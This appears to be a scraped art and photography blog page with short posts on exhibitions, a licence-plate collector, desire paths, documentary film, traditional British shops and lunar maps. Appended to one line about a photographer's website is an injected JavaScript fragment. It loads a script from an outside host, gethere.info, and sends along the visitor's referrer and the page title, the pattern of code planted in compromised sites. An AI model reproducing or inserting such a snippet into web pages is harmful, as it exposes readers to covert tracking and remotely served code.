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Exhibition (19/01/2008 – 04/05/2008)
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Discover more works here and here.
Exhibition (19/01/2008 – 04/05/2008)
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Photographer website: Paul Shambrooms.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;
Woody shares his huge collection of plates with us.
Some of them are older than my grandma.
Woody is member of the Automobile License Plate Collectors Association.
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In a book by Nicholas Crane, “Two Degrees West” – in which he tells of a walk due south across England – he writes:
“Claire was photographing desire paths… the imprints of foot anarchists, individuals who had trodden their own routes into the landscape, regardless of the intentions of government, planners and engineers. A desire path could be a short cut through waste ground, across the corner of a civic garden or down an embankment. They were expressions of free will, ‘paths with a passion’, an alternative to the strictures of railings, fences and walls that turned individuals into powerless apathetic automatons. On desire paths you could break out, explore, feel your way across the landscape.”
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“These photographs are about colour and are a celebration of the natural beauty in the world around us.” – Ans Westra, April 2005
People Collector is a project by Julien Pacaud and Mathilde Aubier.
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The first rule of a documentary filmmaker is: Have the patience to observe life! This documentary film without words observes the faces of children watching a theatre play. The Trumpet and The Cello are an homage to this short film shot by Herz Frank in URSS in 1978.
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A Nation of Shopkeepers looks at traditional shops in Britain which have been trading for over 30 years. These business are an important part the high street and their communities. See also: Semper Eadem, (always the same), this photography and Oral History project documents fifteen places in Leicester which have not changed for at least 25 years.
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USGS Astrogeology Research Program: West side of the moon.
Available to download from here (The PDF navigable version are full vector quality).
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